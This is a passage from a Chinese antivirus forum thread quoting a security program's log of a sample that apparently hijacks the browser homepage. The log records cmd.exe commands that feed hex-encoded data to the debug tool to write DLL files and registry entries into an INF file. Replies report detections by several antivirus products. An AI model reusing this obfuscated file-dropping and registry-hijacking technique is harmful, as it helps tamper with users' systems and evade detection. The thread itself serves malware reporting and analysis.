命令行:/S /D /c" ( echo e 100 7b 33 66 34 35 34 66 30 65 2d 34 32 61 65 2d 34 & echo e 110 64 37 63 2d 38 65 61 33 2d 33 32 38 32 35 30 64 & echo e 120 36 65 32 37 32 7d 22 3e 3e 22 25 73 70 25 5c 68 & echo e 130 6f 6d 65 70 61 67 65 2e 69 6e 66 22 0d 0a 65 63 & echo e 140 68 6f 20 48 4b 43 52 2c 22 43 4c 53 49 44 5c 7b & echo e 150 32 35 35 39 61 31 66 37 2d 32 31 64 37 2d 31 31 & echo e 160 64 34 2d 62 64 61 66 2d 30 30 63 30 34 66 36 30 & echo e 170 62 39 62 62 7d 5c 49 6e 73 74 61 6e 63 65 5c 49 & echo e 180 6e 69 74 50 72 6f 70 65 72 74 79 42 61 67 22 2c & echo e 190 22 43 4c 53 49 44 22 2c 2c 22 7b 31 33 37 30 39 & echo rcx & echo A0 & echo n C:\15.dll & echo w & echo q )"
触发规则:应用程序规则->系统程序->%windir%\system32\cmd.exe->%windir%\system32\cmd.exe


2011-06-14 19:26:13    创建文件      操作:允许
进程路径:C:\WINDOWS\system32\ntvdm.exe
文件路径:C:\15.DLL
触发规则:应用程序规则->WINDOWS文件设置->%windir%\*.exe->?:\*


2011-06-14 19:26:24    运行应用程序      操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\cmd.exe
命令行:/S /D /c" ( echo e 100 36 32 30 2d 43 32 37 39 2d 31 31 43 45 2d 41 34 & echo e 110 39 45 2d 34 34 34 35 35 33 35 34 30 30 30 30 7d & echo e 120 22 3e 3e 22 25 73 70 25 5c 68 6f 6d 65 70 61 67 & echo e 130 65 2e 69 6e 66 22 0d 0a 65 63 68 6f 20 48 4b 43 & echo e 140 52 2c 22 43 4c 53 49 44 5c 7b 32 35 35 39 61 31 & echo e 150 66 37 2d 32 31 64 37 2d 31 31 64 34 2d 62 64 61 & echo e 160 66 2d 30 30 63 30 34 66 36 30 62 39 62 62 7d 5c & echo e 170 49 6e 73 74 61 6e 63 65 5c 49 6e 69 74 50 72 6f & echo e 180 70 65 72 74 79 42 61 67 22 2c 22 63 6f 6d 6d 61 & echo e 190 6e 64 22 2c 2c 22 40 73 68 64 6f 63 6c 63 2e 64 & echo rcx & echo A0 & echo n C:\16.dll & echo w & echo q )"
触发规则:应用程序规则->系统程序->%windir%\system32\cmd.exe->%windir%\system32\cmd.exe


2011-06-14 19:26:25    创建文件      操作:允许
进程路径:C:\WINDOWS\system32\ntvdm.exe
文件路径:C:\16.DLL
触发规则:应用程序规则->WINDOWS文件设置->%windir%\*.exe->?:\*


2011-06-14 19:26:32    运行应用程序      操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\cmd.exe
命令行:/S /D /c" ( echo e 100 6c 6c 2c 2d 31 30 32 34 31 22 3e 3e 22 25 73 70 & echo e 110 25 5c 68 6f 6d 65 70 61 67 65 2e 69 6e 66 22 0d & echo e 120 0a 65 63 68 6f 20 48 4b 43 52 2c 22 43 4c 53 49 & echo e 130 44 5c 7b 32 35 35 39 61 31 66 37 2d 32 31 64 37 & echo e 140 2d 31 31 64 34 2d 62 64 61 66 2d 30 30 63 30 34 & echo e 150 66 36 30 62 39 62 62 7d 5c 49 6e 73 74 61 6e 63 & echo e 160 65 5c 49 6e 69 74 50 72 6f 70 65 72 74 79 42 61 & echo e 170 67 22 2c 22 6d 65 74 68 6f 64 22 2c 2c 22 4f 70 & echo e 180 65 6e 22 3e 3e 22 25 73 70 25 5c 68 6f 6d 65 70 & echo e 190 61 67 65 2e 69 6e 66 22 0d 0a 65 63 68 6f 20 48 & echo rcx & echo A0 & echo n C:\17.dll & echo w & echo q )"
触发规则:应用程序规则->系统程序->%windir%\system32\cmd.exe->%windir%\system32\cmd.exe


2011-06-14 19:26:32    创建文件      操作:允许
进程路径:C:\WINDOWS\system32\ntvdm.exe
文件路径:C:\17.DLL
触发规则:应用程序规则->WINDOWS文件设置->%windir%\*.exe->?:\*


2011-06-14 19:26:37    运行应用程序      操作:阻止
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\cmd.exe
命令行:/S /D /c" ( echo e 100 4b 43 52 2c 22 43 4c 53 49 44 5c 7b 32 35 35 39 & echo e 110 61 31 66 37 2d 32 31 64 37 2d 31 31 64 34 2d 62 & echo e 120 64 61 66 2d 30 30 63 30 34 66 36 30 62 39 62 62 & echo e 130 7d 5c 49 6e 73 74 61 6e 63 65 5c 49 6e 69 74 50 & echo e 140 72 6f 70 65 72 74 79 42 61 67 22 2c 22 50 61 72 & echo e 150 61 6d 31 22 2c 2c 22 25 73 70 25 5c 61 2e 7b 36 & echo e 160 37 31 43 35 33 38 30 2d 35 32 41 30 2d 34 30 36 & echo e 170 39 2d 33 32 45 41 2d 32 38 30 30 32 42 33 30 34 & echo e 180 34 34 34 7d 22 3e 3e 22 25 73 70 25 5c 68 6f 6d & echo e 190 65 70 61 67 65 2e 69 6e 66 22 0d 0a 65 63 68 6f & echo rcx & echo A0 & echo n C:\18.dll & echo w & echo q )"
触发规则:应用程序规则->系统程序->%windir%\system32\cmd.exe->%windir%\system32\cmd.exe


回复

举报

网名丢失
发表于 2011-6-14 19:47:13 | 显示全部楼层
红伞说安全
回复

举报

留侯
发表于 2011-6-14 19:51:35 | 显示全部楼层
过大蜘蛛,已上报!
回复

举报

250662772
发表于 2011-6-14 19:53:27 | 显示全部楼层
附件是已经解密的

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

619875192
发表于 2011-6-14 19:56:47 | 显示全部楼层
卡巴  报木马   KILL
回复

举报

Dirk
发表于 2011-6-14 19:57:30 | 显示全部楼层
to avast!
回复

举报

瓜皮猫
发表于 2011-6-14 21:13:45 | 显示全部楼层
to eset
回复

举报

下一页 »
12下一页
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-6-16 02:35 , Processed in 0.148346 second(s), 22 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表